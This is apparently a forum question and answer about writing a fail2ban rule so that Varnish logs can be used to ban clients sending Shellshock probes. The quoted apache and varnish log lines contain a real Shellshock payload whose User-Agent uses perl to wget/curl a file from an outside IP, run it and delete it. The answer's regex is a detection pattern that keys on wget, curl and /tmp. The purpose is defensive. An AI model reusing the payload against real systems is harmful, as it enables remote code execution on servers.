# fail2ban varish equivalent to apache-noscript

Tags: regex, apache, varnish, noscript, fail2ban

Currently have a server with 2 IPs, one internal and one external with varnish on the external and an apache backend on the internal with fail2ban running pretty much as default.

Recently the website went down returning 503 errors and it turned out fail2ban had banned the varnish from talking to the apache backend vi the   apache-noscript   rule.  I have since added an exclusion for the ip address so this will not get banned again, but ideally I would prefer it if the client was banned in future.

From the apache logs

```
SERVER_IP - - [14/Jan/2015:16:52:57 +0000] "GET /phppath/php HTTP/1.1" 404 438 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS! #";system(\"wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*\");'"
```

From the varnish logs

```
CLIENT_IP - - [14/Jan/2015:16:52:57 +0000] "GET http://SERVER_IP/phppath/php HTTP/1.1" 404 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://69.64.75.181/img.bin -O /tmp/s.pl;curl -O /tmp/s.pl http://69.64.75.181/img.bin;perl /tmp/s.pl;rm -rf s.pl*");'"
```

Would it be okay to just replicate my apache-noscript defnition to use the varnishlogs, i.e.:

```
[apache-noscript]

enabled  = true
port     = http,https
filter   = apache-noscript
logpath  = /var/log/apache*/*error.log
maxretry = 2
```

to become

```
[varnish-noscript]

enabled  = true
port     = http,https
filter   = apache-noscript
logpath  = /var/log/varnish/varnishncsa.log
maxretry = 2
```

I have noticed the apache no script filter has has the following failregex

```
failregex = ^%(_apache_error_client)s (File does not exist|script not found or unable to stat): /\S*(\.php|\.asp|\.exe|\.pl)\s*$
            ^%(_apache_error_client)s script '/\S*(\.php|\.asp|\.exe|\.pl)\S*' not found or unable to stat\s*$
```

I guess the main question is will this still work for the varnishlog in the output above, if not what failregex would I need?

Many Thanks.

[EDIT]  It turns out as a coincidence the noscript did the banning but not for the above log entries.  Now to formulate a fail2ban regex for the above log entry.

Answer (score 0):

Okay I've created a new jail with the following rule to catch the above:

```
failregex = ^<HOST>.*\[[^]]+\].*\".+\"\s[1-9][0-9][0-9]\s[0-9]+\s\".*\"\s\".*(\/tmp|\/usr\/bin|curl\s+|\s*wget\s+|\.bin\s+).*\"$
```

Please feel free to suggest improvements to the rule to catch the log line mentioned above.

The fail regex works on both the apache access log and the varnish csa log.